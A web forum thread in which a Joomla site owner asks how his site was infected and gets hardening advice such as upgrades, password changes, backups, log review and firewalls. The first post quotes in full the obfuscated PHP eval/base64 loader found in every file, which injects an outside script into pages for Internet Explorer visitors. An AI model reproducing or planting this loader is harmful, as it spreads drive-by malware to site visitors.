RocketTheme - TOPIC: (Solved)Virus!! how did they do it? (1/2)

Welcome Guest! Login

0 items Join Now

- Andrew Boyce
- Sr. Rocketeer
- Posts: 237
- Thanks: 0
- Systems Engineer
SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- I found that on of my Joomla websites had a virus it was redirecting all visiters to another website that would then infect the PC with a virus.
  
  after investigating i found that all the PHP files on the site had this code inserted into the begining of the file
  
  <?php /**/ eval(base64_decode("IGlmKGZ1bmN0aW9uX2V4aXN0cygnb2Jfc3RhcnQnKSYmIWlzc2V0KCRHTE9CQUxTWydtcl9ubyddKSl7JEdMT0JBTFNbJ21yX25vJ109MTtpZighZnVuY3Rpb25fZXhpc3RzKCdtcm9iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSl7ZnVuY3Rpb24gZ21sKCl7aWYoc3RyaXBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm1zaWUiKSE9PWZhbHNlKXtyZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5bmJHOWlZV3h3YjNkbGNtbHVaMmRoZEdobGNtbHVaMjl1TG1OdmJTOXRiUzV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTt9cmV0dXJuICIiO319aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7JFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTskUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDtpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTskUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7fWlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7JFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7fWlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxO31pZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7fSRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpO2lmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7JFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDO31yZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mzt9fWZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7aWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpO31lbHNle3JldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpO319b2Jfc3RhcnQoJ21yb2JoJyk7fX0K"));?><?php
  
  How do they do this and mor importantly how do i stop it.
  
  I am using Joomla version 15.22
- Last Edit: 12 years 11 months ago by Andrew Boyce.
- There are only 10 types of people. those that understand binary and those that do not.
#667591
- prim
- Preeminent Rocketeer
- Posts: 17290
- Thanks: 217
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- Hard to say without having full access to the site/FTP.
  
  You can read a bit more about the code here: php.net/manual/en/function.base64-decode.php
- Please reply with a direct link to the issue & create a new thread for each new issue.
  
  A template is only as good as the content that goes into it - DanG
#667598
- Andrew Boyce
- Sr. Rocketeer
- Posts: 237
- Thanks: 0
- Systems Engineer
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- The site is down at the moment as i am restoring the php files from backup. but dam every php file on the entire site is infected with the code above. I am looking for ways to prevent it in future.
- There are only 10 types of people. those that understand binary and those that do not.
#667605
- Smejus57
- Sr. Rocketeer
- Posts: 151
- Thanks: 0
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- After you re-store, shouldn't you upgrade to the newest version of 1.5 (which is 1.5.3) as well?
#667739
- Andrew Boyce
- Sr. Rocketeer
- Posts: 237
- Thanks: 0
- Systems Engineer
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- Done... thank you but I do not think this would help with this exact problem.
- There are only 10 types of people. those that understand binary and those that do not.
#667742
- prim
- Preeminent Rocketeer
- Posts: 17290
- Thanks: 217
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- 1. rockettheme.com/quicklinks/security/36-v...urity-specific-links
  2. Change all usernames/passwords if you can and make them long and random.
  3. You should use Akeeba Backup in the future. It will save you a lot of time .
- Please reply with a direct link to the issue & create a new thread for each new issue.
  
  A template is only as good as the content that goes into it - DanG
#667743
- Andrew Boyce
- Sr. Rocketeer
- Posts: 237
- Thanks: 0
- Systems Engineer
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- I do but I have it run nightly and the backup from last night has the virus. fortunately i have an older one and was able to restore it.
  
  I am using GuardXT now. just installed it cool product you should check it out.. www.joomlaxt.com/index.php?option=com_re...31&func=select&id=12
- There are only 10 types of people. those that understand binary and those that do not.
#667747
- Smejus57
- Sr. Rocketeer
- Posts: 151
- Thanks: 0
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- I never meant for my post to imply that upgrading the recent version of Joomla! would solve the current problems, but running an out of date Joomla! version only leaves you open to attacks.
  
  Good luck getting your issues solved!!
#667831
- edfel
- Elite Rocketeer
- Posts: 584
- Thanks: 0
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- Hi there:
  
  Try to check web server logs files. It is a must for you to determine the area of entry to block the hole. I also recommend using a Joomla firewall extension. I use Defender and have work wonders.
  
  There are many articles regarding hardening your web server.
  
  Two tools that have worked for me:
  
  APF firewall
  BFT (detecs and blocks excesive unauthorized login atempts)
  
  However, please note that you must feel confident of your skills as you can lock-out yourself. Many security actions depend on the platform you are using (Windows, Linux).
  
  Hope you can restore and block the intruders away.
- Apache 2.4.23 | PHP 7.0.10 | MySQL 5.5.50 | RHEL 6.8
  Joomla 3.6.2
#667860
- Andrew Boyce
- Sr. Rocketeer
- Posts: 237
- Thanks: 0
- Systems Engineer
Re: SOLVED Virus!! how did they do it?

Posted 13 years 11 months ago
- Thanks, everyone..
  I have restored the site and so far it looks safe. I realized i had not implemented the .htaccess file on this web site and have done so.
  
  My web server is Ubuntu server with LAMP and i have approximately 100 joomla web sites on it and the only one that was infected so far that i can tell was this one. but like i said the .htaccess file was not set on this site and the files and directories were set to full access i have changed this as well.
  
  I will check out the APF firewall and BTF and report back my findings etc..
  
  Thanks again
- There are only 10 types of people. those that understand binary and those that do not.
#668067